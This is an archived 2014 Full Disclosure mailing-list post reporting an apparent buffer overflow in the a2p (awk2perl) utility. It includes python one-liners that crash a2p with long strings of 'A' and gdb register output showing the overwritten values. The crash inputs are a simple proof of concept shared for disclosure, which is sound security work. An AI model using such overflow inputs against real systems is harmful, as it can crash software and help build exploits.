lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20141227225837.95192tx6x3js4eqs@webmail.alunos.dcc.fc.up.pt>
Date: Sat, 27 Dec 2014 22:58:37 +0100
From: up201407890@...nos.dcc.fc.up.pt
To: fulldisclosure@...lists.org
Subject: [FD] /usr/bin/a2p buffer overflow

$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g'

I have found what it appears to be a buffer overflow on the a2p (awk2perl)
utility. It comes by default on several different systems.

Tested on Fedora 20, Fedora 19, Debian, and works probably on every other
UNIX-like.

Eg:

[saken@...py ~]$ python -c "print 'A' * 2048" | a2p >/dev/null
[saken@...py ~]$ python -c "print 'A' * 2049" | a2p >/dev/null
[saken@...py ~]$ python -c "print 'A' * 2050" | a2p >/dev/null
Segmentation fault

or

[saken@...py ~]$ python -c "print 'A'*3000" > lel
[saken@...py ~]$ gdb a2p
(gdb) r lel
Starting program: /usr/bin/a2p lel
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x000000000040b7c5 in yyparse ()
(gdb) info reg
rax            0x4141414141414141        8680820740569200760
rbx            0x1        1
rcx            0x0        0
rdx            0x67d724        6805284
rsi            0x67dab0        6806192
rdi            0x41414141        2021161080
rbp            0x6        0x6
rsp            0x7fffffffe1d0        0x7fffffffe1d0
r8             0x8        8
r9             0x5f        95
r10            0x0        0
r11            0x38e0174b60        244277791584
r12            0x6        6
r13            0x0        0
r14            0x0        0
r15            0x0        0
rip            0x40b7c5        0x40b7c5 <yyparse+757>
eflags         0x10206        [ PF IF RF ]
cs             0x33        51
ss             0x2b        43
ds             0x0        0
es             0x0        0
fs             0x0        0
gs             0x0        0

('^@+@...'-!@%.')

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists